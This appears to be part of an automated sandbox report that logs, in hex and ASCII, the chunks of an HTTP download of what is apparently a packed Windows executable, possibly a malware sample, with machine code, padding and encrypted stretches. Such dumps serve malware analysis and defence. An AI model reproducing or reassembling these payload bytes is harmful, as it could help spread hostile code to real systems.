                                                        2022-11-20 22:29:22 UTC8INData Raw: 29 40 00 34 29 40 00 30 29 40 00 2c 29 40 00 28 29 40 00 24 29 40 00 20 29 40 00 1c 29 40 00 18 29 40 00 14 29 40 00 10 29 40 00 0c 29 40 00 08 29 40 00 04 29 40 00 00 29 40 00 fc 28 40 00 f8 28 40 00 f4 28 40 00 f0 28 40 00 ec 28 40 00 e8 28 40 00 e4 28 40 00 e0 28 40 00 d4 28 40 00 c8 28 40 00 c0 28 40 00 b4 28 40 00 9c 28 40 00 90 28 40 00 7c 28 40 00 5c 28 40 00 3c 28 40 00 1c 28 40 00 fc 27 40 00 dc 27 40 00 b8 27 40 00 9c 27 40 00 78 27 40 00 58 27 40 00 30 27 40 00 14 27 40 00 04 27 40 00 00 27 40 00 f8 26 40 00 e8 26 40 00 c4 26 40 00 bc 26 40 00 b0 26 40 00 a0 26 40 00 84 26 40 00 64 26 40 00 3c 26 40 00 14 26 40 00 ec 25 40 00 c0 25 40 00 a4 25 40 00 80 25 40 00 5c 25 40 00 30 25 40 00 04 25 40 00 e8 24 40 00 8a 13 40 00 43 4f 4e 4f 55 54 24 00
                                                        Data Ascii: )@4)@0)@,)@()@$)@ )@)@)@)@)@)@)@)@)@(@(@(@(@(@(@(@(@(@(@(@(@(@(@|(@\(@<(@(@'@'@'@'@x'@X'@0'@'@'@'@&@&@&@&@&@&@&@d&@<&@&@%@%@%@%@\%@0%@%@$@@CONOUT$
                                                        2022-11-20 22:29:22 UTC8INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC8INData Raw: 32 30 30 30 0d 0a 61 00 6b 00 69 00 70 00 65 00 78 00 65 00 77 00 6f 00 76 00 61 00 00 00 62 00 6f 00 7a 00 65 00 72 00 61 00 73 00 75 00 6b 00 75 00 64 00 61 00 70 00 75 00 63 00 6f 00 79 00 61 00 68 00 69 00 70 00 20 00 76 00 6f 00 73 00 65 00 76 00 6f 00 73 00 75 00 74 00 75 00 6d 00 65 00 79 00 61 00 6e 00 69 00 77 00 6f 00 6b 00 69 00 67 00 75 00 76 00 75 00 64 00 69 00 67 00 75 00 63 00 61 00 20 00 62 00 6f 00 6e 00 65 00 79 00 69 00 67 00 61 00 6c 00 75 00 6a 00 20 00 73 00 61 00 76 00 6f 00 6d 00 69 00 76 00 69 00 78 00 6f 00 68 00 75 00 6a 00 75 00 7a 00 20 00 79 00 6f 00 72 00 75 00 76 00 75 00 67 00 75 00 6d 00 61 00 62 00 61 00 79 00 65 00 6c 00 69 00 6e 00 69 00 6d 00 61 00 6d 00 00 00 00 00 48 00 75 00 6c 00 00 00 63 00 61 00 6e 00 69 00 66
                                                        Data Ascii: 2000akipexewovabozerasukudapucoyahip vosevosutumeyaniwokiguvudiguca boneyigaluj savomivixohujuz yoruvugumabayelinimamHulcanif
                                                        2022-11-20 22:29:22 UTC16INData Raw: 05 88 18 41 00 74
                                                        Data Ascii: At
                                                        2022-11-20 22:29:22 UTC16INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC16INData Raw: 32 30 30 30 0d 0a 16 8b 46 08 8b 0d 84 19 41 00 85 48 70 75 08 e8 7d 20 00 00 89 46 04 8b 46 08 f6 40 70 02 75 14 83 48 70 02 c6 46 0c 01 eb 0a 8b 08 89 0e 8b 40 04 89 46 04 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 ec 28 53 56 ff 75 0c 8d 4d f0 e8 64 ff ff ff 8b 75 08 33 db 3b f3 75 28 e8 8b 07 00 00 53 53 53 53 53 c7 00 16 00 00 00 e8 13 07 00 00 83 c4 14 38 5d fc 74 07 8b 45 f8 83 60 70 fd d9 ee eb 61 8b 45 f0 83 b8 ac 00 00 00 01 7e 14 8d 45 f0 50 0f b6 06 6a 08 50 e8 7e 28 00 00 83 c4 0c eb 10 0f b6 0e 8b 80 c8 00 00 00 0f b7 04 48 83 e0 08 3b c3 74 03 46 eb c9 8d 45 f0 50 53 53 56 e8 1c 1d 00 00 59 50 8d 45 d8 56 50 e8 a3 27 00 00 dd 40 10 83 c4 18 38 5d fc 74 07 8b 45 f8 83 60 70 fd 5e 5b c9 c3 8b ff 55 8b ec 6a 00 ff 75 08 e8 46 ff ff ff 59 59 5d c3
                                                        Data Ascii: 2000FAHpu} FF@puHpF@F^]U(SVuMdu3;u(SSSSS8]tE`paE~EPjP~(H;tFEPSSVYPEVP'@8]tE`p^[UjuFYY]
                                                        2022-11-20 22:29:22 UTC24INData Raw: 10 8a 8c 05 fc fd
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC24INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC24INData Raw: 32 30 30 30 0d 0a ff ff eb 11 f6 c1 02 74 15 80 4c 06 1d 20 8a 8c 05 fc fc ff ff 88 8c 06 1d 01 00 00 eb 08 c6 84 06 1d 01 00 00 00 40 3b c7 72 be eb 56 8d 86 1d 01 00 00 c7 85 e4 fa ff ff 9f ff ff ff 33 c9 29 85 e4 fa ff ff 8b 95 e4 fa ff ff 8d 84 0e 1d 01 00 00 03 d0 8d 5a 20 83 fb 19 77 0c 80 4c 0e 1d 10 8a d1 80 c2 20 eb 0f 83 fa 19 77 0e 80 4c 0e 1d 20 8a d1 80 ea 20 88 10 eb 03 c6 00 00 41 3b cf 72 c2 8b 4d fc 5f 33 cd 5b e8 54 21 00 00 c9 c3 6a 0c 68 a8 ff 40 00 e8 2f f2 ff ff e8 cf ed ff ff 8b f8 a1 84 19 41 00 85 47 70 74 1d 83 7f 6c 00 74 17 8b 77 68 85 f6 75 08 6a 20 e8 67 e0 ff ff 59 8b c6 e8 47 f2 ff ff c3 6a 0d e8 dc 13 00 00 59 83 65 fc 00 8b 77 68 89 75 e4 3b 35 88 18 41 00 74 36 85 f6 74 1a 56 ff 15 d0 10 40 00 85 c0 75 0f 81 fe 60 14 41
                                                        Data Ascii: 2000tL @;rV3)Z wL wL A;rM_3[T!jh@/AGptltwhuj gYGjYewhu;5At6tV@u`A
                                                        2022-11-20 22:29:22 UTC32INData Raw: 18 75 f6 2b c6 40
                                                        Data Ascii: u+@
                                                        2022-11-20 22:29:22 UTC32INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC32INData Raw: 32 30 30 30 0d 0a 50 89 45 f8 e8 3e d1 ff ff 8b f8 59 3b fb 75 0c 56 ff 15 10 11 40 00 e9 45 ff ff ff ff 75 f8 56 57 e8 1a 25 00 00 83 c4 0c 56 ff 15 10 11 40 00 8b c7 5f 5e 5b c9 c3 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 24 11 40 00 a3 f4 57 47 00 85 c0 75 02 5d c3 33 c0 40 a3 10 77 47 00 5d c3 8b ff 55 8b ec 83 ec 10 a1 10 14 41 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 14 14 41 00 eb 60 56 8d 45 f8 50 ff 15 3c 11 40 00 8b 75 fc 33 75 f8 ff 15 38 11 40 00 33 f0 ff 15 cc 10 40 00 33 f0 ff 15 34 11 40 00 33 f0 8d 45 f0 50 ff 15 30 11 40 00 8b 45 f4 33 45 f0 33 f0 3b f7 75 07 be 4f e6 40 bb eb 0b 85 f3 75 07 8b c6 c1 e0 10 0b f0 89 35 10 14 41 00 f7 d6 89 35 14 14 41 00 5e
                                                        Data Ascii: 2000PE>Y;uV@EuVW%V@_^[U39EjhP$@WGu]3@wG]UAeeSWN@;ttA`VEP<@u3u8@3@34@3EP0@E3E3;uO@u5A5A^
                                                        2022-11-20 22:29:22 UTC40INData Raw: e8 e5 35 00 00 59
                                                        Data Ascii: 5Y
                                                        2022-11-20 22:29:22 UTC40INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC40INData Raw: 32 30 30 30 0d 0a 66 3b 85 40 e5 ff ff 0f 85 68 03 00 00 83 85 38 e5 ff ff 02 83 bd 20 e5 ff ff 00 74 29 6a 0d 58 50 89 85 40 e5 ff ff e8 b8 35 00 00 59 66 3b 85 40 e5 ff ff 0f 85 3b 03 00 00 ff 85 38 e5 ff ff ff 85 30 e5 ff ff 8b 45 10 39 85 44 e5 ff ff 0f 82 f9 fd ff ff e9 27 03 00 00 8b 0e 8a 13 ff 85 38 e5 ff ff 88 54 0f 34 8b 0e 89 44 0f 38 e9 0e 03 00 00 33 c9 8b 06 03 c7 f6 40 04 80 0f 84 bf 02 00 00 8b 85 34 e5 ff ff 89 8d 40 e5 ff ff 84 db 0f 85 ca 00 00 00 89 85 3c e5 ff ff 39 4d 10 0f 86 20 03 00 00 eb 06 8b b5 28 e5 ff ff 8b 8d 3c e5 ff ff 83 a5 44 e5 ff ff 00 2b 8d 34 e5 ff ff 8d 85 48 e5 ff ff 3b 4d 10 73 39 8b 95 3c e5 ff ff ff 85 3c e5 ff ff 8a 12 41 80 fa 0a 75 10 ff 85 30 e5 ff ff c6 00 0d 40 ff 85 44 e5 ff ff 88 10 40 ff 85 44 e5 ff ff
                                                        Data Ascii: 2000f;@h8 t)jXP@5Yf;@;80E9D'8T4D83@4@<9M (<D+4H;Ms9<<Au0@D@D
                                                        2022-11-20 22:29:22 UTC48INData Raw: 2d 0f 94 c1 8b f8
                                                        Data Ascii: -
                                                        2022-11-20 22:29:22 UTC48INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC48INData Raw: 32 30 30 30 0d 0a 03 cb 8b c1 e8 2c ff ff ff 8b 7d 14 83 3f 2d 8b f3 75 06 c6 03 2d 8d 73 01 83 7d 0c 00 7e 18 8d 46 01 8a 08 88 0e 8b f0 8b 45 f0 8b 80 bc 00 00 00 8b 00 8a 00 88 06 33 c0 38 45 18 0f 94 c0 03 45 0c 03 f0 83 7d 08 ff 75 05 83 cb ff eb 05 2b de 03 5d 08 68 6c 23 40 00 53 56 e8 2b f2 ff ff 83 c4 0c 33 db 85 c0 74 0d 53 53 53 53 53 e8 e6 85 ff ff 83 c4 14 8d 4e 02 39 5d 10 74 03 c6 06 45 8b 47 0c 46 80 38 30 74 2e 8b 47 04 48 79 05 f7 d8 c6 06 2d 46 83 f8 64 7c 0a 99 6a 64 5f f7 ff 00 06 8b c2 46 83 f8 0a 7c 0a 99 6a 0a 5f f7 ff 00 06 8b c2 00 46 01 f6 05 08 5c 47 00 01 74 14 80 39 30 75 0f 6a 03 8d 41 01 50 51 e8 2e c1 ff ff 83 c4 0c 80 7d fc 00 74 07 8b 45 f8 83 60 70 fd 33 c0 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 2c a1 10 14 41 00 33 c5 89
                                                        Data Ascii: 2000,}?-u-s}~FE38EE}u+]hl#@SV+3tSSSSSN9]tEGF80t.GHy-Fd|jd_F|j_F\Gt90ujAPQ.}tE`p3_^[U,A3
                                                        2022-11-20 22:29:22 UTC56INData Raw: 0f ad d0 d3 ea c3
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC56INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC56INData Raw: 31 66 66 38 0d 0a 8b c2 33 d2 80 e1 1f d3 e8 c3 33 c0 33 d2 c3 8b ff 55 8b ec 8b 45 10 8b 4d 0c 25 ff ff f7 ff 23 c8 56 f7 c1 e0 fc f0 fc 74 31 57 8b 7d 08 33 f6 3b fe 74 0b 56 56 e8 e8 0c 00 00 59 59 89 07 e8 a5 67 ff ff 6a 16 5f 56 56 56 56 56 89 38 e8 2e 67 ff ff 83 c4 14 8b c7 5f eb 1d 8b 75 08 50 ff 75 0c 85 f6 74 09 e8 b8 0c 00 00 89 06 eb 05 e8 af 0c 00 00 59 59 33 c0 5e 5d c3 8b ff 55 8b ec 56 8b 75 08 57 56 e8 77 b9 ff ff 59 83 f8 ff 74 50 a1 20 77 47 00 83 fe 01 75 09 f6 80 84 00 00 00 01 75 0b 83 fe 02 75 1c f6 40 44 01 74 16 6a 02 e8 4c b9 ff ff 6a 01 8b f8 e8 43 b9 ff ff 59 59 3b c7 74 1c 56 e8 37 b9 ff ff 59 50 ff 15 6c 11 40 00 85 c0 75 0a ff 15 88 10 40 00 8b f8 eb 02 33 ff 56 e8 93 b8 ff ff 8b c6 c1 f8 05 8b 04 85 20 77 47 00 83 e6 1f c1
                                                        Data Ascii: 1ff8333UEM%#Vt1W}3;tVVYYgj_VVVVV8.g_uPutYY3^]UVuWVwYtP wGuuu@DtjLjCYY;tV7YPl@u@3V wG
                                                        2022-11-20 22:29:22 UTC64INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC64INData Raw: 00 00 00 00 00 00 00 00 ec 11 40 00 af 4f 40 00 02 00 00 00 ec 11 40 00 01 00 00 00 16 00 00 00 02 00 00 00 02 00 00 00 03 00 00 00 02 00 00 00 04 00 00 00 18 00 00 00 05 00 00 00 0d 00 00 00 06 00 00 00 09 00 00 00 07 00 00 00 0c 00 00 00 08 00 00 00 0c 00 00 00 09 00 00 00 0c 00 00 00 0a 00 00 00 07 00 00 00 0b 00 00 00 08 00 00 00 0c 00 00 00 16 00 00 00 0d 00 00 00 16 00 00 00 0f 00 00 00 02 00 00 00 10 00 00 00 0d 00 00 00 11 00 00 00 12 00 00 00 12 00 00 00 02 00 00 00 21 00 00 00 0d 00 00 00 35 00 00 00 02 00 00 00 41 00 00 00 0d 00 00 00 43 00 00 00 02 00 00 00 50 00 00 00 11 00 00 00 52 00 00 00 0d 00 00 00 53 00 00 00 0d 00 00 00 57 00 00 00 16 00 00 00 59 00 00 00 0b 00 00 00 6c 00 00 00 0d 00 00 00 6d 00 00 00 20 00 00 00 70 00 00 00 1c 00 00
                                                        Data Ascii: @O@@!5ACPRSWYlm p
                                                        2022-11-20 22:29:22 UTC72INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC72INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC80INData Raw: 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC80INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC80INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC88INData Raw: 2c b4 e1 f5 3c 52
                                                        Data Ascii: ,<R
                                                        2022-11-20 22:29:22 UTC88INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC88INData Raw: 32 30 30 30 0d 0a b2 4c 79 a4 27 0a 94 1b a3 ee af 22 2a 66 33 81 af bc c3 85 01 81 62 1e ea d4 95 cf 10 a3 d6 35 c0 98 37 6c 21 ed 0b 38 e5 01 a0 8f 8d b0 f9 61 81 da a0 25 31 34 79 53 67 c6 c9 d0 19 51 92 8f 4c 13 22 70 73 68 38 fb 18 11 3d 2c 1c 1e da ad aa 76 71 30 4d 05 64 9e 9c 30 a5 2e 7e a2 b7 7c 0e 22 58 f0 1e 24 da 98 a8 9c 5a aa 4a 25 2d 2d 52 bd 7e 50 d5 eb 90 c2 77 75 f1 88 bc e4 02 47 19 cc 59 4f 2d 27 d0 75 21 f0 c8 cd 07 8d 42 59 ca 55 90 c7 44 ee 65 ff 58 ad ec 69 b7 d2 1a d5 c2 97 e6 a5 46 5b 0f 83 f1 89 73 c3 80 ad 5e e2 ca a8 de 16 92 a1 e4 7f 6f 9d 03 53 dc d4 3e ca 27 84 2a 2a 08 40 55 2d c1 a9 32 72 34 be d1 ef fd 18 2b c9 1d ec 6e 16 cd 49 c2 42 83 ca 21 30 64 75 8d f4 2b fe 8a eb 19 df 2e 3f 58 dd d3 8e 41 7d 88 19 4c b6 00 b6 e9
                                                        Data Ascii: 2000Ly'"*f3b57l!8a%14ySgQL"psh8=,vq0Md0.~|"X$ZJ%--R~PwuGYO-'u!BYUDeXiF[s^oS>'**@U-2r4+nIB!0du+.?XA}L
                                                        2022-11-20 22:29:22 UTC96INData Raw: 61 fc be 63 26 24
                                                        Data Ascii: ac&$
                                                        2022-11-20 22:29:22 UTC96INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC96INData Raw: 32 30 30 30 0d 0a 47 d0 c3 e2 06 e9 69 d3 23 61 a8 f5 bb d7 58 fa 3c e6 9a e5 b3 43 2e e5 a1 25 f6 55 62 41 0c 02 6c 5d d9 1b d1 f9 1d 98 b4 fa c2 45 4c 4c 12 e9 39 7d 81 51 92 a6 d0 93 f2 d9 fd 9d e4 5e 6d 6c c7 eb 56 bd fa 46 f4 23 c5 a5 da e7 f4 10 b6 d6 c8 31 fd 00 db 5f 57 b3 49 77 b3 cf b1 e2 95 60 4e 9c 68 28 57 2e 26 a1 65 e2 29 e5 99 88 ef 64 ac fe af e2 c0 a7 a3 68 01 71 d7 e6 40 95 56 67 3c 21 50 c4 ef d3 da 0a f4 04 e4 70 c0 2d 25 1b a4 29 0e d6 ea 45 4c f1 88 99 67 fa a7 f0 59 61 8f 38 a9 09 f3 3a 59 ab 3d b5 3a ba 86 d2 8b 74 ad 74 ca 89 24 d5 ad 30 32 60 d8 a5 54 89 2f 30 98 ab b2 0f fe 5b e8 d6 59 0e f7 b3 a7 f6 8d f3 51 f3 e0 9d d8 49 34 d7 94 fa 7c f0 d2 e0 2a 83 f0 be c5 af b3 72 9f 2b 97 7d 84 3d db 60 07 3b c4 ff e4 75 08 f2 c5 f7 f7
                                                        Data Ascii: 2000Gi#aX<C.%UbAl]ELL9}Q^mlVF#1_WIw`Nh(W.&e)dhq@Vg<!Pp-%)ELgYa8:Y=:tt$02`T/0[YQI4|*r+}=`;u
                                                        2022-11-20 22:29:22 UTC104INData Raw: 9d 51 da 02 aa 9c
                                                        Data Ascii: Q
                                                        2022-11-20 22:29:22 UTC104INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC104INData Raw: 32 30 30 30 0d 0a d7 0d 3b ba c9 82 a7 b5 33 19 89 24 fb 38 87 ed c5 b8 a5 4c c9 ff 47 4d 9e 6d 94 29 0b de 9e 48 fc a6 05 c1 1b 5f 7c 46 80 bd 54 52 5f 38 48 5c 18 5f 87 b4 6f 87 03 62 33 4f ea 33 12 44 56 7e e0 93 03 3c ce 50 9d 14 b4 fc 8c 66 ac 15 6a 0f 03 50 57 b4 75 a4 0e e0 50 aa 13 22 a1 43 68 87 26 d5 76 16 1e 24 88 53 09 a2 6f f9 58 c4 e9 e5 c7 79 62 a2 f1 92 16 8e 01 34 c3 80 65 af 75 f0 cb e2 4a ce 48 ec 88 fc 80 d0 b1 28 7e 2a 92 e7 d9 6e f7 87 24 53 9e 8a ad e3 70 e6 a1 e4 24 ff 53 ab 72 44 dc fc 82 eb 80 0a c2 6d ba b3 59 b6 9a 67 f2 8e 91 a1 e1 65 e2 e1 4c 99 ae 96 47 e6 f6 6c 4a 27 e8 f9 2d 77 c9 7a 8b c9 65 98 46 99 f2 d0 e7 20 bd 69 8a 7c 4b dc 09 70 dc 5e 86 fc 1e c1 e3 6d 8a 32 fb bc 77 60 d8 bd a0 57 f4 e4 82 13 37 fd bf 7a 95 07 c8
                                                        Data Ascii: 2000;3$8LGMm)H_|FTR_8H\_ob3O3DV~<PfjPWuP"Ch&v$SoXyb4euJH(~*n$Sp$SrDmYgeLGlJ'-wzeF i|Kp^m2w`W7z
                                                        2022-11-20 22:29:22 UTC112INData Raw: 1a 80 ac d7 03 ca
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC112INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC112INData Raw: 32 30 30 30 0d 0a f8 5d 3b ad a8 30 f6 17 c0 e8 17 e5 41 5c 02 e7 f9 8e 0e 08 8a f0 7f c5 70 85 36 cb a2 58 51 dc bb 53 9c ad f2 41 67 b2 15 39 18 53 2e 39 76 2c f3 bc 8a 3d 39 3d 7f 8b 14 40 28 5b 28 cf f2 6a 08 4c b6 fb 40 02 57 a5 05 28 26 f7 45 d1 3a 10 f6 db 04 fd b2 cf e8 58 97 7c c6 e7 b2 f1 c4 a8 6c 54 8a 91 91 2b eb e1 ff 81 2d dc 7e a2 2e 4e a4 ec 6e d7 1f 7f 6f db 57 d1 c1 d7 fa bf 1d 49 75 18 fe 71 52 af 8a 78 ac be bb 49 72 32 15 98 74 88 50 78 72 ee 24 4b 1d 97 a8 3d a7 75 32 77 7f a9 80 a6 87 4a c7 3a c7 fe 62 54 cf 2c b6 e9 84 01 d5 96 f8 80 e9 ee e5 85 db 97 f3 3a a2 af 10 33 25 1b 5f 40 b5 94 39 77 f4 7a 28 de 19 b3 ce 58 e2 00 8b 3d 02 af ba 35 e6 d0 ac 03 b4 f6 1d 22 69 87 0f 29 a2 0f f2 98 27 f6 c9 6a 6e aa 33 b3 2c 9e 14 27 46 b3 8b
                                                        Data Ascii: 2000];0A\p6XQSAg9S.9v,=9=@([(jL@W(&E:X|lT+-~.NnoWIuqRxIr2tPxr$K=u2wJ:bT,:3%_@9wz(X=5"i)'jn3,'F
                                                        2022-11-20 22:29:22 UTC120INData Raw: 6d 2d 72 5a 5f 9f
                                                        Data Ascii: m-rZ_
                                                        2022-11-20 22:29:22 UTC120INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC120INData Raw: 31 66 66 38 0d 0a db ff ff ff 53 9f 4a 0a 11 da 6f 64 68 2d d6 cb d2 f2 df f4 2a 39 69 1a be ea 45 e1 12 24 a6 15 ce 3b ea f2 0a b3 ed 3d 3d 63 5b 7b c3 1b 93 0f ab c5 ff 78 65 ff 37 47 d2 e1 75 5f ae 17 dd e0 86 f1 63 95 83 8e b0 46 59 bd 38 5e fd 56 7a 3c 8d 53 d0 58 35 b5 00 bc aa e1 e2 60 94 9c e3 73 c9 eb 3d 1e 7a 5a ec fa 3b d1 45 98 62 96 28 ad a0 34 89 09 d5 b9 1e d7 53 93 66 a5 7f 90 ad 99 18 52 92 a6 2c db 10 b8 f6 2e a1 4f e3 ab 60 81 9b be f3 ff 2b 42 75 4e 61 5b b2 df bf 37 96 b4 97 db 12 cd 6a bf bc ee 33 28 e0 60 7a f1 45 fe 80 62 93 0d 1d c8 cc c7 b2 3c a6 2b bb b5 bc 1b c7 67 8d 7c 8c 2a 00 b8 06 54 a0 a1 a2 20 88 46 1a fd 28 ab 72 35 0b 5b 9c 48 0d a7 9a 05 29 2a 4c 7d b6 22 ec 83 6f 0b dd 4a b2 b0 1f 7e 5f 78 49 f5 4e 3d 14 13 49 6c 6b
                                                        Data Ascii: 1ff8SJodh-*9iE$;==c[{xe7Gu_cFY8^Vz<SX5`s=zZ;Eb(4SfR,.O`+BuNa[7j3(`zEb<+g|*T F(r5[H)*L}"oJ~_xIN=Ilk
                                                        2022-11-20 22:29:22 UTC128INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC128INData Raw: b9 ea 93 c5 01 49 e9 e0 aa 5c 29 be 1f 5e ea 23 c5 56 fa 68 67 bf 59 b9 c5 82 eb 74 9d e8 f5 ef f6 9c e6 43 99 b8 11 9d 2b 9d a4 e8 90 35 62 c2 62 75 0d 3b 1e 30 40 6e 91 8d ab 02 81 b5 7b ec ce 9b 08 ec d8 9b 75 08 ed f7 6c cc e0 a9 9b 26 82 80 22 64 e9 fb 23 a8 5f 6c 66 66 52 7f dd 80 96 ca b7 ad e0 f2 f4 11 d5 55 7d a3 27 60 94 fa 08 28 b4 ba 98 92 cc 55 21 57 fe 1a 03 b6 5b 87 28 ef 80 11 36 55 92 b6 c8 ab dc 8f 77 56 ae 45 8f 95 f7 61 36 b8 95 60 28 d8 98 b7 87 99 54 a0 21 7d 9c 22 a8 4c a1 c5 5f 02 08 eb 95 88 ac 30 be 2b da b4 4e 7e e1 49 9e af 37 24 be c1 89 d1 ca 31 4b 52 89 62 74 cd 33 ee 8b 64 a4 7d 7a 30 3d 88 89 d1 9a a7 c8 65 c2 65 3e 76 30 f7 cf 41 96 ae b8 3d dd 84 1f 9d fe 59 f1 51 0e ad fa bb ab 1d 89 d0 36 50 d7 2f ec 76 ac 92 99 74 aa
                                                        Data Ascii: I\)^#VhgYtC+5bbu;0@n{ul&"d#_lffRU}'`(U!W[(6UwVEa6`(T!}"L_0+N~I7$1KRbt3d}z0=ee>v0A=YQ6P/vt
                                                        2022-11-20 22:29:22 UTC136INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC136INData Raw: 32 30 30 30 0d 0a 20 c2 de 45 04 bf 4d 5f 94 f0 4e 03 3e 37 f6 02 38 ee 3d be ad 6d cc f5 da 55 92 46 e3 9c c2 46 1c 3a ee 17 d4 cc 6f 07 9c 09 9a c1 e9 44 d2 7c 06 d3 09 52 4a 44 60 dd 67 c2 c0 7f 6d 45 8d 29 2a a1 91 4d 7f 2c 26 15 cf 16 3c 4f 1b 5b 03 c9 7e d5 4f 7f c3 a1 bc bb 6b 21 07 51 25 f8 75 aa 43 58 4e 20 17 f1 9f c0 4f 82 90 9b 22 59 d9 c5 bf 40 f7 9e d6 51 5d 15 4c 10 72 b8 a3 b1 27 42 29 d5 ce 68 ce 8b 6b aa 69 cf 85 42 41 0a ba 97 2c 38 b7 6c 65 b9 13 85 15 0e 73 6f 7e 0d 08 aa a1 42 ce 5a ea 12 f7 98 a1 20 63 be f4 1e 2c c7 13 b6 7d 71 df 23 3c 14 e2 4e 64 1c 80 15 c1 70 e1 80 25 fd 38 e1 d3 0b 70 dc 8c d6 ac 42 37 17 ed 8e 0f b9 0c fc 0c d5 06 f5 d0 e6 0d 42 af 4a ef fc 56 c4 a5 5f ce 3f f2 3d de 0f 3b 3d 05 da 4d 3f 83 db 91 4a af c6 5b
                                                        Data Ascii: 2000 EM_N>78=mUFF:oD|RJD`gmE)*M,&<O[~Ok!Q%uCXN O"Y@Q]Lr'B)hkiBA,8leso~BZ c,}q#<Ndp%8pB7BJV_?=;=M?J[
                                                        2022-11-20 22:29:22 UTC144INData Raw: 51 ad 30 de 0a 45
                                                        Data Ascii: Q0E
                                                        2022-11-20 22:29:22 UTC144INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC144INData Raw: 32 30 30 30 0d 0a 65 3c 5c f0 84 71 cd ca fe 9f 79 0b e3 62 24 16 1a da 58 02 05 18 8d 22 bd b7 12 63 53 37 1d a4 ce 85 3c b9 81 88 8b 26 a0 33 fd 4c 0b 25 61 74 79 12 c0 eb 17 b5 23 51 dc 0d 12 89 0f d3 e5 90 db 48 e9 68 23 f5 4e 6d c9 b2 40 7a 2c 77 38 08 2e 02 a1 04 95 f6 24 68 99 30 88 a1 53 93 78 55 2e b4 d4 61 bd 62 a7 e7 3a 8b d8 d9 d5 f5 30 49 94 35 62 39 e4 b5 54 25 9c 9a 93 ab 96 a5 f9 4a 31 a9 f3 d2 ab 8d 58 ae a3 66 e2 bc cf be cd d9 d9 73 f5 16 bb a9 a0 47 7f 47 bd 07 78 dd 7a 8c ed d4 16 f7 17 73 bf 9a 97 e8 e2 02 7c 29 28 98 84 a5 41 b6 ba 3d 72 15 38 c3 46 82 5a 9f 5c 82 0b c8 70 38 b0 84 b3 1d 4d 14 5f 2e 13 09 de 93 ab 1e a6 a7 19 42 33 44 f7 c0 54 e0 75 d0 c0 15 87 77 c6 87 f8 46 d3 35 c7 ec de 64 cd 25 2c d0 2b 10 b3 0e cd fe dc f9 d1
